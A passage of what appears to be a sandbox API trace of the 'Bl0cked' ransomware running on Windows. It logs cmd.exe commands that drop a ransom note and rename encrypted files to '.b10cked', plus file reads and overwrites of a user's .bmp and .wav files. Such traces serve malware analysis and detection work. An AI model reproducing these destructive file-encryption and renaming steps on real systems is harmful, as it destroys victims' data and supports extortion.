cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0223.976] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0223.976] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xd44, dwThreadId=0xe78)) returned 1 [0223.978] CloseHandle (hObject=0x120) returned 1 [0223.978] CloseHandle (hObject=0x1b4) returned 1 [0223.978] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf")) returned 0x20 [0223.978] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0223.978] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0223.978] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\65oav.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28076829663) returned 1 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa1aa [0223.980] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa692 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa692 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.982] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5348, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5348, lpOverlapped=0x0) returned 1 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.982] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5348, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5348, lpOverlapped=0x0) returned 1 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21320, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x534a [0223.982] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5348, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5348, lpOverlapped=0x0) returned 1 [0223.983] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21320, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x534a [0223.983] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5348, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5348, lpOverlapped=0x0) returned 1 [0223.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="65OAv.bmp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0223.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="65OAv.bmp", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="65OAv.bmp", lpUsedDefaultChar=0x0) returned 9 [0223.986] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa692 [0223.986] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0223.987] CloseHandle (hObject=0x1b4) returned 1 [0223.987] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\65OAv.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp") returned 0x30 [0223.988] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0223.988] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf74, dwThreadId=0xef0)) returned 1 [0223.990] CloseHandle (hObject=0x120) returned 1 [0223.990] CloseHandle (hObject=0x1b4) returned 1 [0223.990] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.990] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.990] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount2=46) returned 2 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28077949460) returned 1 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.992] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x9f36 [0223.992] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0223.992] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa41e [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa41e [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.993] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x520e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x520e, lpOverlapped=0x0) returned 1 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.993] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x520e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x520e, lpOverlapped=0x0) returned 1 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21006, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 